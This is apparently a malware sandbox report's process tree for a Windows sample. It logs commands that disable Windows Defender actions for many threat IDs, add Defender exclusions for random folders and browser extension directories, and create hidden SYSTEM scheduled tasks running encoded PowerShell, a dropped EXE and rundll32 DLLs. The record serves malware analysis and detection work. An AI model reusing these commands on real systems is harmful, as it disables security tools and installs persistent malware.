- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:128
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:1504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4496
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CsUgOGApU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CsUgOGApU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VQnigEewLHUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VQnigEewLHUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YXRVthYkCAsAC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YXRVthYkCAsAC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eBaLNwdfBoAU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eBaLNwdfBoAU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\feaAGXZTPHSTZufvckR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\feaAGXZTPHSTZufvckR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dHiLAKBZJoSzXVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dHiLAKBZJoSzXVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rlXICvrLwbHDFviC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rlXICvrLwbHDFviC\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:32 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CsUgOGApU" /t REG_DWORD /d 0 /reg:323⤵PID:1696
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CsUgOGApU" /t REG_DWORD /d 0 /reg:324⤵PID:4896
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CsUgOGApU" /t REG_DWORD /d 0 /reg:643⤵PID:3344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VQnigEewLHUn" /t REG_DWORD /d 0 /reg:323⤵PID:3300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VQnigEewLHUn" /t REG_DWORD /d 0 /reg:643⤵PID:1916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YXRVthYkCAsAC" /t REG_DWORD /d 0 /reg:323⤵PID:1092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YXRVthYkCAsAC" /t REG_DWORD /d 0 /reg:643⤵PID:4760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eBaLNwdfBoAU2" /t REG_DWORD /d 0 /reg:323⤵PID:1944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eBaLNwdfBoAU2" /t REG_DWORD /d 0 /reg:643⤵PID:2252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\feaAGXZTPHSTZufvckR" /t REG_DWORD /d 0 /reg:323⤵PID:4136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\feaAGXZTPHSTZufvckR" /t REG_DWORD /d 0 /reg:643⤵PID:2844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dHiLAKBZJoSzXVVB /t REG_DWORD /d 0 /reg:323⤵PID:2828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dHiLAKBZJoSzXVVB /t REG_DWORD /d 0 /reg:643⤵PID:2328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI /t REG_DWORD /d 0 /reg:323⤵PID:1048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI /t REG_DWORD /d 0 /reg:643⤵PID:3752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rlXICvrLwbHDFviC /t REG_DWORD /d 0 /reg:323⤵PID:4836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rlXICvrLwbHDFviC /t REG_DWORD /d 0 /reg:643⤵PID:4752
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gREYxDCQc" /SC once /ST 10:29:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:1496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gREYxDCQc"2⤵PID:2940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gREYxDCQc"2⤵PID:1272
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TVsECgUtwDhLZifMW" /SC once /ST 01:09:09 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rlXICvrLwbHDFviC\PquTZmovzMTprHT\bDkvZNw.exe\" I3 /jhsite_idDAc 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "TVsECgUtwDhLZifMW"2⤵PID:3776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3684 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3348
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4144
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3100
-
C:\Windows\Temp\rlXICvrLwbHDFviC\PquTZmovzMTprHT\bDkvZNw.exeC:\Windows\Temp\rlXICvrLwbHDFviC\PquTZmovzMTprHT\bDkvZNw.exe I3 /jhsite_idDAc 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1936 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bHNJINcAmGBfsLXkXG"2⤵PID:1996
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:4996
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:4796
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:2372
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5068 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CsUgOGApU\MZfkyG.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jHYEWeDFllXYdol" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jHYEWeDFllXYdol2" /F /xml "C:\Program Files (x86)\CsUgOGApU\MywMKWK.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:920
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jHYEWeDFllXYdol"2⤵PID:4028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jHYEWeDFllXYdol"2⤵PID:1404
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "opRoyIfSGoYQul" /F /xml "C:\Program Files (x86)\eBaLNwdfBoAU2\RruFcMY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4412
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ipVEcCYbpTyEb2" /F /xml "C:\ProgramData\dHiLAKBZJoSzXVVB\yUCgIso.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1492
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NdTWWpscfLExPZKYg2" /F /xml "C:\Program Files (x86)\feaAGXZTPHSTZufvckR\vDJuyOT.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "auFylssPRYUhOjCZxxH2" /F /xml "C:\Program Files (x86)\YXRVthYkCAsAC\mDdvrUo.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:128
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IypqguOSOyxhMfXuI" /SC once /ST 03:40:55 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\rlXICvrLwbHDFviC\ueHXonDf\ykchFyH.dll\",#1 /Hzsite_idZDO 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4652
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "IypqguOSOyxhMfXuI"2⤵PID:2080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TVsECgUtwDhLZifMW"2⤵PID:2596
-
-
